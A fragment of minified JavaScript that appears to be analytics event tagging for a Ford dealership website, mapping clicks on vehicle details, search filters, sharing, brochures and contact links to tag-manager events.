(jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action:" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:back to search"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.VDP_IMAGE_GALLERY_LEFT_NAV") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action:" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:photo scroll"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.VDP_IMAGE_GALLERY_RIGHT_NAV") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action:" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:photo scroll"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.VDP_IMAGE_GALLERY_VIDEO_PLAY") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:video play"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.VDP_IMAGE_GALLERY_THUMBNAIL_CLICK") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:photo click"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.FEATURE_TAB") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; var featureCategory = jzlAnalyticsObject[ 'vdp_feature_category' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:" + featureCategory; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.SIDEBAR_FILTER_RANGE_CHANGED") { (function() { var foundConditions = jzlAnalyticsObject[ 'srp_found_conditions' ]; var condition = foundConditions.length === 1 ? foundConditions[0] : "all"; var searchedMakes = jzlAnalyticsObject[ 'srp_searched_makes' ] || []; var searchedModels = jzlAnalyticsObject[ 'srp_searched_models' ] || []; var nameplate = ""; if (searchedMakes.length > 0) { nameplate = (searchedMakes[0] + " " + searchedModels[0]).toLowerCase().trim(); } var filterName = (jzlAnalyticsObject[ 'srp_filter_name' ] || "").toLowerCase(); jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vls:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vls:content:filter:" + filterName; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.SIDEBAR_FILTER_VALUE_TOGGLE") { (function() { if (jzlAnalyticsObject[ 'srp_filter_is_checked' ]) { var foundConditions = jzlAnalyticsObject[ 'srp_found_conditions' ]; var condition = foundConditions.length === 1 ? foundConditions[0] : "all"; var searchedMakes = jzlAnalyticsObject[ 'srp_searched_makes' ] || []; var searchedModels = jzlAnalyticsObject[ 'srp_searched_models' ] || []; var nameplate = ""; if (searchedMakes.length > 0) { nameplate = (searchedMakes[0] + " " + searchedModels[0]).toLowerCase().trim(); } var filterName = (jzlAnalyticsObject[ 'srp_filter_name' ] || "").toLowerCase(); jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vls:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vls:content:filter:" + filterName; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); } })(); } if (action === "AUTO5.SIDEBAR_FILTER_VISIBILITY") { (function() { var foundConditions = jzlAnalyticsObject[ 'srp_found_conditions' ]; var condition = foundConditions.length === 1 ? foundConditions[0] : "all"; var searchedMakes = jzlAnalyticsObject[ 'srp_searched_makes' ] || []; var searchedModels = jzlAnalyticsObject[ 'srp_searched_models' ] || []; var nameplate = ""; if (searchedMakes.length > 0) { nameplate = (searchedMakes[0] + " " + searchedModels[0]).toLowerCase().trim(); } var filterName = (jzlAnalyticsObject[ 'srp_filter_name' ] || "").toLowerCase(); jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vls:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vls:content:filter:" + filterName; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.SAVE_VEHICLE") { (function() { var modelYear = jzlAnalyticsObject( 'vdp_year' ); var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; var srpType = pageSubType === "srp" ? "vls:content" : pageSubType === "vdp" ? "vehicle details" : "vehicle compare"; var label = pageSubType === "srp" ? "row20(T)(1c)" : pageSubType === "vdp" ? "row33(T)(1c)" : "row31(T)(1c)"; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:" + srpType + ":content:action"; if (pageSubType === "compare") { jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:" + srpType + ":save"; } else { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:" + srpType + ":add:favorite"; } if (pageSubType === "vdp") { jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; } jzlAnalyticsObject[ 'ford' ][ 'model_year' ] = modelYear; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, label); })(); } if (action === "AUTO5.UNSAVE_VEHICLE") { (function() { var modelYear = jzlAnalyticsObject( 'vdp_year' ); var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; var srpType = pageSubType === "srp" ? "vls:content" : pageSubType === "vdp" ? "vehicle details" : "vehicle compare"; var label = pageSubType === "srp" ? "row20(T)(1c)" : pageSubType === "vdp" ? "row33(T)(1c)" : "row31(T)(1c)"; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:" + srpType + ":content:action"; if (pageSubType === "compare") { jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:" + srpType + ":remove"; } else { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:" + srpType + ":remove:favorite"; } if (pageSubType === "vdp") { jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; } jzlAnalyticsObject[ 'ford' ][ 'model_year' ] = modelYear; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, label); })(); } if (action === "AUTO5.ADD_SUBSCRIPTION_VEHICLE") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; var srpType = pageSubType === "srp" ? "vls:content" : "vehicle details"; var label = pageSubType === "srp" ? "row20(T)(1c)" : "row33(T)(1c)"; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:" + srpType + ":content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:" + srpType + ":add:alert"; if (pageSubType === "vdp") { jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; } jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, label); })(); } if (action === "AUTO5.REMOVE_SUBSCRIPTION_VEHICLE") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; var srpType = pageSubType === "srp" ? "vls:content" : "vehicle details"; var label = pageSubType === "srp" ? "row20(T)(1c)" : "row33(T)(1c)"; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:" + srpType + ":content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:" + srpType + ":remove:alert"; if (pageSubType === "vdp") { jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; } jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, label); })(); } if (action === "AUTO5.CARFAX_LOGO_CLICK") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:carfax"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row20(T)(1c)"); })(); } if (action === "AUTO5.AUTOCHECK_LOGO_CLICK") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:autocheck"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row20(T)(1c)"); })(); } if (action === "AUTO5.CHANGE_SORT_ORDER") { (function() { var foundConditions = jzlAnalyticsObject[ 'srp_found_conditions' ]; var condition = foundConditions.length === 1 ? foundConditions[0] : "all"; var searchedMakes = jzlAnalyticsObject[ 'srp_searched_makes' ] || []; var searchedModels = jzlAnalyticsObject[ 'srp_searched_models' ] || []; var nameplate = ""; if (searchedMakes.length > 0) { nameplate = (searchedMakes[0] + " " + searchedModels[0]).toLowerCase().trim(); } jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vls:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vls:content:sort by"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row20(T)(1c)"); })(); } if (action === "AUTO5.FBSHARE") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:share"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.TWEET") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:tweet"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.PAYMENT_CALCULATOR") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "payment-estimator-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(8c)"); })(); } if (action === "AUTO5.EMAIL") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); var condition = jzlAnalyticsObject[ 'vdp_condition' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":" + condition + ":si:vehicle details:content:action"; if (nameplate !== "") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] += ":" + nameplate; } jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = condition + ":si:vehicle details:share"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "vehicle details:payment estimator"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row33(T)(1c)"); })(); } if (action === "AUTO5.HPS_TAB_CLICK") { (function() { var tabName = jzlAnalyticsObject[ 'hps_tab_name' ]; var tabNameMap = { "price_range": "price", "make_model": "model", "vehicle_type": "body" }; if (tabName in tabNameMap) { tabName = tabNameMap[tabName]; } jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":home:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "home:content:" + tabName + " search"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = ""; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row15(T)(1c)"); })(); } if (action === "AUTO5.FTS_INPUT_SUBMITTED") { (function() { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":home:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "home:content:search"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = ""; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row15(T)(1c)"); })(); } if (action === "AUTO5.PAYMENT_CALCULATOR_CTA") { (function() { var ctaTitle = jzlAnalyticsObject[ 'cta_title' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":finance:payment calculator:" + ctaTitle + ":calculate"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "finance:payment calculator:" + ctaTitle + ":calculate"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = ""; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row143(T)(1c)"); })(); } if (action === "AUTO5.BROCHURE_DOWNLOAD") { (function() { var brochureName = jzlAnalyticsObject[ 'brochure_name' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":ford brochures:" + brochureName + ":download"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "ford brochures:brochure download:" + brochureName; jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = "ford brochures"; jzlAnalyticsObject[ 'ford' ][ 'site_section' ] = "ford brochures"; jzlAnalyticsObject[ 'ford' ][ 'hierarchy' ] = "ford brochures"; jzlAnalyticsObject[ 'ford' ][ 'tool' ] = "event:pdf brochure"; jzlAnalyticsObject[ 'ford' ][ 'tool_descriptor' ] = "ford brochures:pdf brochure"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = ""; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-download"; fireDtm(jzlAnalyticsObject, "row56(T)(7c)"); })(); } if (action === "AUTO5.INCENTIVES_POPUP_OPEN") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = "specials:manufacturer incentives:vrfq"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-overlay"; fireDtm(jzlAnalyticsObject, "row90(T)(2c)"); })(); } if (action === "AUTO5.a5-redeem-incentive-event") { (function() { var nameplate = (jzlAnalyticsObject[ 'vdp_make' ] + ' ' + jzlAnalyticsObject[ 'vdp_model' ]).toLowerCase().trim(); jzlAnalyticsObject[ 'ford' ][ 'page_name' ] = "specials:manufacturer incentives:vrfq"; jzlAnalyticsObject[ 'ford' ][ 'nameplate' ] = nameplate; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-overlay"; fireDtm(jzlAnalyticsObject, "row90(T)(2c)"); })(); } if (action === "AUTO5.GOOGLE_MAP_CLICK") { (function() { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":contact us:hours and directions:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "contact us:content:map click"; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row163(T)(1c)"); })(); } if (action === "AUTO5.DOWNLOAD_COLLISION_GUIDE") { (function() { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":service:collision:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "collision:content:collision guide"; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row128(T)(1c)"); })(); } if (action === "AUTO5.DOWNLOAD_CPO_BROCHURE") { (function() { var brochureName = jzlAnalyticsObject[ 'click_file_name' ]; var brochureNameWithoutExtension = brochureName.substring(0, brochureName.lastIndexOf('.')); jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":cpo overview:download"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "cpo overview:brochure download:" + brochureNameWithoutExtension; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-download"; fireDtm(jzlAnalyticsObject, "row59(T)(7c)"); })(); } if (action === "AUTO5.REVIEW_CTA_CLICK") { (function() { var linkName = jzlAnalyticsObject[ 'link_name' ]; jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":service:review:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "review:content:" + linkName; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row98(T)(1c)"); })(); } if (action === "FORM.SUBMITCLICK") { (function() { var formType = jzlAnalyticsObject[ 'form_type' ]; if (formType === "service-question") { (function() { if (pageType === "service-specials") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":specials:service and parts specials:content:submit"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "specials:service and parts specials:content:submit"; jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, "row86(T)(1c)"); } })(); } })(); } if (action === "BLOG_ACTION.LINK_CLICK") { (function() { var clickType = jzlAnalyticsObject[ 'action_click_type' ]; var dtmClickType = "archive"; if (clickType === "category" || clickType === "tag") { dtmClickType = "tag"; } else if (clickType === "photo") { dtmClickType = "picture click"; } else if (clickType === "more") { dtmClickType = "archive"; } var label = null; if (pageSubType === "post") { var title = (jzlAnalyticsObject['page_title'] || "untitled").toLowerCase(); jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":about us:blog:" + title + ":content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "about us:blog:" + title + ":content:" + dtmClickType; label = "row156(T)(1c)"; } else { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":about us:blog:content:action"; jzlAnalyticsObject[ 'ford' ][ 'onclick' ] = "about us:blog:content:" + dtmClickType; label = "row158(T)(1c)"; } jzlAnalyticsObject[ 'ford' ][ 'action_name' ] = "global-onclick"; fireDtm(jzlAnalyticsObject, label); })(); } if (action === "GLOBAL_ACTION.LINK_CLICK") { (function() { var href = jzlAnalyticsObject[ 'action_href' ]; var type = null; if (href != null) { if (href.startsWith("tel:")) { type = "click to call"; } else if (href.startsWith("sms:")) { type = "click to text"; } else if (href.startsWith("mailto:")) { type = "email"; } } if (type != null) { var mapping = { "ford-quick-lane": { type: "quicklane", label: "row110(T)(1c)" }, // row110(T) "oil-change": { type: "oil change", label: "row114(T)(1c)" }, // row114(T) "brake-service": { type: "brake service", label: "row118(T)(1c)" }, // row118(T) "battery-service": { type: "battery service", label: "row122(T)(1c)" }, // row122(T) "tire-care": { type: "tire care", label: "row126(T)(1c)" }, // row126(T) "collision": { type: "collision", label: "row128(T)(1c)" }, // row128(T) "ford-owner-advantage-rewards": { type: "owner advantage", label: "row132(T)(1c)" } // row132(T) }; var mappedInfo = mapping[pageType]; var inMain = jzlAnalyticsObject[ 'action_in_main' ]; var isHandled = false; if (mappedInfo != null && inMain) { var mappedPageType = mappedInfo.type; var label = mappedInfo.label; jzlAnalyticsObject['ford']['onclick_link_name'] = prefix + ":service:" + mappedPageType + ":content:action"; jzlAnalyticsObject['ford']['onclick'] = mappedPageType + ":content:" + type; if (pageType === "ford-owner-advantage-rewards") { jzlAnalyticsObject['ford']['onclick'] = "service:" + jzlAnalyticsObject['ford']['onclick']; } jzlAnalyticsObject['ford']['model_year'] = undefined; jzlAnalyticsObject['ford']['nameplate'] = undefined; jzlAnalyticsObject['ford']['body_model_trim'] = undefined; jzlAnalyticsObject['ford']['engine_trans'] = undefined; jzlAnalyticsObject['ford']['price'] = undefined; jzlAnalyticsObject['ford']['action_name'] = "global-onclick"; fireDtm(jzlAnalyticsObject, label); isHandled = true; } else if (pageType === "staff" && inMain) { if (type === "click to call" || type === "email") { jzlAnalyticsObject[ 'ford' ][ 'onclick_link_name' ] = prefix + ":about us:meet our staff:content:action"; jzlAnalyticsObject[ 